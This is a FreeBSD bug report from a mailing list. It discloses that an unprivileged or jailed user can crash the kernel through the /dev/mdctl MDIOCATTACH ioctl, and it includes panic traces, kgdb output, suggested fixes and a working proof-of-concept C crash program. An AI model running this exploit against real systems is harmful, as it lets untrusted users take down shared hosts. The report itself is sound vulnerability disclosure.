>Number: 169683
>Category: misc
>Synopsis: System crash via ioctl() on mdctl.
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Filip Palian
>Release: FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012
r...@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also
within the jail if only provided by devfs(.rules)) via ioctl() handler in
"/usr/src/sys/dev/md/md.c:1127". The crash occures in function bcopy()
(md.c:491) called in mdstart_preload() (md.c:493). Some detailed information
included below.
-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:
Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address = 0xd550ba7a
fault code = supervisor read, page not present
instruction pointer = 0x20:0xc0d46bfe
stack pointer = 0x28:0xd8e13ca0
frame pointer = 0x28:0xd8e13cbc
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, def32 1, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 3154 (md671657984)
trap number = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13
--
# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy <--- paniced here on $esi (0xd550ba7a)
--
(kgdb) bt
#0 doadump (textdump=1) at pcpu.h:244
#1 0xc0a1845a in kern_reboot (howto=260) at
/usr/src/sys/kern/kern_shutdown.c:442
#2 0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3 0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at
/usr/src/sys/i386/i386/trap.c:975
#4 0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at
/usr/src/sys/i386/i386/trap.c:888
#5 0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6 0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7 0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in ""/usr/src/sys/dev/md/md.c".
To prevent evil users from doing bad things administrators should ensure, that
"/dev/mdctl" permissions are +rw (600) only for root.
For servers where jails are provided for untrusted users (e.g. hosting
companies) access to "/dev/mdctl" device should be forbidden/hidden using
defvs.rules.
Patch attached with submission follows:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>
int main()
{
int f;
struct md_ioctl s;
struct stat ss;
s.md_version = MDIOVERSION;
//s.md_type = MD_PRELOAD;
s.md_type = MD_MALLOC;
/* this one becomes sc->pl_ptr */
s.md_base = 0x41414141-0x200;
if (stat("/dev/mdctl", &ss) != 0) {
printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
exit (0);
}
f = open("/dev/mdctl", O_RDONLY, 0);
printf("say goodnight...\n");
if (ioctl(f, MDIOCATTACH, &s) < 0)
printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
printf("no +r no fun\n");
exit (0);
}
>Release-Note:
>Audit-Trail:
>Unformatted:
_______________________________________________
freebsd-bugs@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-bugs
To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
